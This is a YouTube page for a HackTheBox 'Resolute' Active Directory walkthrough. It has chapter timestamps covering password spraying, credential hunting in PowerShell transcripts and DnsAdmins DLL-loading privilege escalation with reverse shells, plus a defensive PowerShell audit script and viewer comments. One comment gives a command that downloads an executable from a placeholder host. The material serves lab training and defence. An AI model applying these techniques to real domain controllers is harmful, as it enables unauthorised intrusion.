HackTheBox - Resolute

41,161 views

IppSec

1 day ago

00:00 - Intro
01:08 - Talking about my switch to Parrot
02:00 - Begin of nmap, discovering it is likely a Windows Domain Controller
04:30 - Checking if there are any open file shares
06:11 - Using RPCClient to enumerate domain users (enumdomusers)
07:55 - Using CrackMapExec to dump the PasswordPolicy
08:45 - Using RPCClient to dump Active Directory information (querydispinfo)
10:45 - Bruteforcing accounts via CrackMapExec with password of Welcome123!
14:30 - Using Evil-WinRM to remote into the server as Melanie
15:40 - Building the latest version of Seatbelt on CommandoVM (The DotNet version is incompatible)
17:40 - Explaining some cool bash one line tricks, then linking Egypt's "One liners to rule them all" talk
24:40 - Changing Seatbelt to compile to Version 4.0 then trying again.
26:30 - Finally examining the Seatbelt output, see the PSTranscript Directory and a Custom group in DNSAdmins
29:50 - Using RPCClient to Enumerate members of the Contractors group (enumdomgroups/querygroupmem)
35:30 - Running WinPEAS to compare the differences
38:30 - Exploring hidden directories to see PSTranscripts, then finding credentials in a powershell log
44:20 - Using Evil-WinRM with the password from a PSTranscript File to get shell as Ryan
45:40 - Quickly going over how to execute code on a Domain Controller as a DNS Admin
46:10 - Using MSFVenom to create a Reverse Shell DLL (we'll do this better at end of the video)
49:10 - Using DNSCMD to have the DNS Server execute our MSFVenom created DLL from an SMB Network Path... Works but hangs the DNS Server
52:50 - Using the DNS-EXE-Persistance project to help us create a better way to do the Reverse Shell
53:03 - Explaining the DNSCMD Exploit path and how it can be used both for lateral movement and privesc
54:50 - Start of creating the DLL to use with this DNS Exploit
56:45 - Grabbing a C++ Reverse Shell program from GitHub to add to our DNS Exploit Project, then modifying it to execute as a thread
01:02:20 - Showing that we get a Reverse Shell and DNS keeps running
01:03:52 - Removing the "CreateThread" portion of our code to show that it was needed; without CreateThread the DNS Server hangs because execution stops in the RevShell code
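A defender-side counterpart to the DNSCMD path covered at 45:40 and 53:03, added here as an example and not code from the video: it reads the ServerLevelPluginDll value that dnscmd /config writes under the DNS service's registry key and lists DnsAdmins membership recursively, which also surfaces a custom group nested inside DnsAdmins like the one seen at 26:30. It assumes it runs on the DNS server (the domain controller) with local admin rights and that the ActiveDirectory PowerShell module is installed.

```powershell
# Audit check for the DnsAdmins / ServerLevelPluginDll privilege-escalation path.
# Assumptions: run on the DNS server as a local administrator; the ActiveDirectory
# module is available for the group lookup.
$dnsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

# 1. Any ServerLevelPluginDll value is worth a look: on restart the DNS service
#    loads that DLL as SYSTEM, which is exactly what the dnscmd technique relies on.
$plugin = Get-ItemProperty -Path $dnsParams -Name 'ServerLevelPluginDll' -ErrorAction SilentlyContinue
if ($null -ne $plugin) {
    $path = $plugin.ServerLevelPluginDll
    Write-Warning "ServerLevelPluginDll is set: $path"
    # A UNC path matches the pattern from the video: the service fetching the DLL over SMB.
    if ($path -like '\\*') { Write-Warning 'Plugin path is a network (UNC) path' }
    if (-not (Test-Path -LiteralPath $path)) { Write-Warning 'Plugin path does not exist on disk' }
} else {
    Write-Output 'No ServerLevelPluginDll value configured'
}

# 2. Enumerate who can set that value: DnsAdmins plus every principal nested in it.
#    Nested groups (such as a contractors group added to DnsAdmins) show up here.
Import-Module ActiveDirectory
Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
    Select-Object objectClass, SamAccountName, DistinguishedName |
    Format-Table -AutoSize
```

Clearing the value with dnscmd /config /serverlevelplugindll "" and restarting the DNS service removes a planted plugin; membership changes to DnsAdmins are the thing to alert on.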

Comments: 85
@IND_Abhi 4 years ago
that new feature is awesome on the timeline
@terror403 4 years ago
I fear that this feature is a premise to a new censor
@ShinigamiAnger 4 years ago
ItsMe why? That thing is generated if there are time stamps in the video description, so it is just great if the video creator cares enough to write them down. Having the little spaces on the timeline is a consequence of that, and kinda irrelevant tbh.
@ItsMeooooooo 4 years ago
@@ShinigamiAnger I don't get your point. This feature has been seen on pornhub for months now
@ShinigamiAnger 3 years ago
@@ItsMeooooooo and so what?
@r0kithax 4 years ago
Really glad you covered some opsec topics like safe dll injection and benefits of remotely enumerating active directory which I didn't cover in my video. Keep up the good work, we're all looking forward to your next video! :D
@KrizyzZ00 4 years ago
We learn so much from each video you make. Thank you for being such a good teacher and mentor. I've been watching your videos for a year and a half now and I'm always surprised at how detailed your videos are.
@azelbane87 4 years ago
MAJESTIC walkthrough as usual!! Also nice to see YOU using ParrotOS!! BRAVISSIMO!!!
@GabrielGutierrez 4 years ago
First two minutes of the video and I already said WOW, as always great work “Master”.
@CaptainMarmoo 4 years ago
I'm glad you decided to use Parrot, I know you were thinking about it a few days ago from Twitter so it's good to see this
@feiwoza 4 years ago
Oh, Twitter... I need to look for the handle :) thanks
@MooseC00kie 1 year ago
LOVE your teaching/educational skills 👌
@ichigok2594 4 years ago
Thanks. I learn a lot of tricks from your videos. Really appreciate the knowledge you share. 🙏
@mr.fakeman4718 4 years ago
3:30 I've just heard that /etc/hosts thing being covered here. Wow, I'm surprised! :0 I don't know who didn't know this already, but at least this got covered too.
@tchqtch1273 4 years ago
Thank you for this great video, but when you used the winrm command, should there be a specific port to connect to?
@juliusgrybauskas816 4 years ago
you fkng genius dude... god bless you for your kindness
@DHIRAL2908 4 years ago
Please tell us the customizations you did! I use Parrot but I really want the theme HTB's Pwnbox uses!
@jrodhd 3 years ago
This would be very nice!
@raj77in 4 years ago
As usual good video. For the awk command you can use '[\[\]]' as separator.
@ippsec 4 years ago
I had tried that, didn't seem to work as expected. So just did it one at a time.
@raj77in 4 years ago
@@ippsec with the latest version of awk in Fedora, which is "GNU Awk 5.0.1, API: 3.0", this version works - "cat /tmp/users |awk -F'[][]' '{print $2}'"
@Reelix 4 years ago
Hey Ipp! When doing a - p - in nmap, try including a - - min-rate=5000 if you don't mind a noisy scan. It will make your - p - scan significantly faster (minutes to seconds) :) Edit: Added spaces to bypass KZfaq formatting
@wildwanderer5650 4 years ago
Sometimes it may not give you an accurate scan. That's why we don't normally use --min-rate and --max-retries. Even though we get a significant time difference with them, we'll be missing some ports which need time for retransmission. You know our scan wouldn't pick up all the results when it shows that it hit the retransmission cap. Try it on your own to check it. If you're in HTB do this with Blue / Optimum, and do a normal scan with it too, and compare the results.
@westernvibes1267 4 years ago
I switched to Parrot KDE from Kali last week and it's just way more beautiful than Kali and easier to work with.
@Tarexant 4 years ago
@IppSec are you going to just use a notes file from here on in or are you going to use CherryTree again? CherryTree was nice.
@LoayMatar 4 years ago
You've mentioned PowerShell quite a bit, can you do in-depth videos about PowerShell?
@pdyli 8 months ago
❤❤❤❤
@harshmodi5901 4 years ago
My Kali crashed as well!!!! You can use Sublime Text and create a md file for notes
@FreezeLuiz 4 years ago
The PS command threw an exception because, I think, you need to specify the absolute path to the output file: (new-object net.webclient).downloadfile("ip/exe","c:\bla\bla\file.exe")
@vladimirjanout6951 3 years ago
1:51 May I ask how you managed to take the customization of HTB Parrot OS into your own machine?
@de_pack_ 4 years ago
At 07:28, when the > operator is used, the file is truncated and hence there is nothing to operate on. Thus the blank file. I ended up losing a source file once doing this and it was a painful lesson.
@m.abbasansari2664 4 years ago
yeet this is awesome
@teststudent5032 3 years ago
Great video as usual IppSec! I worked on the DLL and it looks like when we exit from the shell the DNS server crashes. Would you please check? I used the code you used.
@kumars9012 4 years ago
Your videos are good, it would be helpful if you could mention what you are looking at and why you execute the command. It would be helpful for beginners like me
@utku_yucel 4 years ago
Thanks!
@Rose-ng2zp 4 years ago
How do you export customization from Pwnbox to a local install of Parrot OS?
@pwndumb2903 4 years ago
Hi. Great video.
@gabriyel2193 4 years ago
I know you from somewhere ...
@muhammadhafeez5491 4 years ago
Can you please tell us how you configure your terminal?
@ltfranz4747 4 years ago
Getting Native Command Failed when I tried to run Seatbelt.exe, any suggestions?
@rustyshackles9563 4 years ago
Crackmapexec doesn't give me any of that info. Do I need to install anything else to get it to work?
@timrustle6114 1 year ago
Wow, I was stuck on how to get to ryan for a while, somehow my winPEAS didn't show the transcript directory, how can that be?!
@adampetersen1300 7 months ago
Hello, question for you - I noticed you didn't have any issues running Seatbelt but I keep getting picked up by the AV. I tried using some AMSI bypass; what version of Seatbelt were you using? I am compiling locally w/ .NET 4.0
@ippsec 7 months ago
I am not positive, this video is pretty old. I would try removing the help output and such and trying again. Also make sure you aren't compiling in debug mode
@adampetersen1300 7 months ago
@@ippsec 🤘great thanks for the tips!
@michaeljay2110 4 years ago
how did you get the pwnbox theme?
@moeaj1536 3 years ago
can you make a video about PowerShell commands? ...that will be great dude ....
@elikelik3574 4 years ago
I wonder how a human being can know so many things? =D I'd like to know how you learn so many different topics, maybe you can share your learning style with us. Yeah we know, you are already sharing much valuable knowledge with us, and we are thankful to you. By the way, here at 55:41 it is German (PS: I am not German, I just know the language). Take care of yourself. Peace
@ilyarik8888 4 years ago
IppSec, why do you use a VPN on your Kali machine if you've not been doing anything malicious, only for research purposes? Is there a reason you don't want to let any traffic out from your VM? Do you use openvpn only on your virtual machine or on the host as well? What VPN servers do you recommend to use and for what cost? Point out if the answers are in one of your videos already, I didn't find that. And what software do you prefer for virtualizing your working machines? Thank you, I'm a beginning security researcher.
@ippsec 4 years ago
The VPN puts you on HackTheBox's network, which is the only way these machines can be accessed. Additionally, VPN or TOR != illegal activity. There are plenty of legitimate use cases for either. If I am on public WiFi, I'll use a VPN to ensure no one is intercepting my traffic.
@ilyarik8888 4 years ago
Ok, this is a part of HTB's infra, I see. And what VPN service would you recommend? I'm not sure what site I should trust with all my network activity. I'm afraid of my VPN being used against me.
@ippsec 4 years ago
Any reputable VPN should be fine. Don't do illegal things and a lot of those concerns go away.
@ilyarik8888 4 years ago
I don't, I'm on the light side. Thank you, next stream there will be a donation from me :)
@zatoidarkchi 2 years ago
Hey, when I try 'sc.exe stop dns' it says Access is denied?? Any ideas?
@vasusethia554 4 years ago
Why was rpcclient able to authenticate a NULL session while smbclient failed to do so?
@Stefan-we9up 4 years ago
rpcclient uses the RPC protocol, and smbclient uses SMB. Those are 2 different things
@briansullivan8334 3 years ago
I know it's been a little over 4 months and you've probably been busy, but is there any chance you can upload your terminal settings finally? To either GitHub or even Pastebin?
@ippsec 3 years ago
Someone else has done it. I primarily just don't want people coming to me when things break. github.com/theGuildHall/pwnbox
@briansullivan8334 3 years ago
@@ippsec Understandable. Thank you very much for the link, sir. Have a great day and stay safe!
@itzcloudy09 1 year ago
@@briansullivan8334 did you manage to customize your terminal like that?
@ggnova8581 4 years ago
Do vulnhub boxes also
@okiplays8639 3 years ago
Doing this box with IppSec's walkthrough and used the below to extract the username that's in brackets: awk -F'[][]' '{print $2}' users.txt
@DebeMechero 4 years ago
21:33 next time, try with NET USE * /DELETE on cmd
@viraat_maurya 4 years ago
65535 Ports :)
@coverterror 4 years ago
There has to be an easier way to do the DLL thread
@ippsec 4 years ago
As far as programming goes that is pretty easy; just need to know the language
@Ms.Robot. 4 years ago
Your wife must be the luckiest woman. She gets HTB previews anytime. 💗
@AndresMolinaR 4 years ago
crackmapexec -pass-pol gave me nothing, I don't understand why, is this why you don't like Kali anymore?
@ichigok2594 4 years ago
Andres Molina I had the same issue. It's not showing pwned and also smbmap -d domain -u user -p password -H host says authentication failure.
@ippsec 4 years ago
It's very picky with the order of arguments and if you have it wrong it doesn't tell you, just displays nothing. Also could be the impacket version
@AndresMolinaR 4 years ago
IppSec You're the Man, after installing and uninstalling nothing worked, I even tried Parrot, however, I've just upgraded impacket and it worked just like you said, appreciate it! Thanks again.
@ltfranz4747 4 years ago
yeah my crackmapexec is version 5.0.2 and I'm still getting no response for --pass-pol, on a fresh install of Parrot Security btw
@huladoll272 3 years ago
Adding -u '' -p '' to the command worked for me.
@milanjovic4663 4 years ago
Back to Kali!!!
@zedrobot5864 4 years ago
Plz go back to Kali
@ippsec 4 years ago
You didn't give any reasons why.
@zedrobot5864 4 years ago
@@ippsec old habits die hard 😎😁
@buestrm2841 4 years ago
@@zedrobot5864 😂
@SyN4pS62 3 years ago
Just for the record, the compilation errors you had were just because of the #include "stdafx.h" that was located at the bottom of the list of the includes... for some reason, it just cannot be. Hope this helps :)
@JuanBotes 4 years ago
Thanks!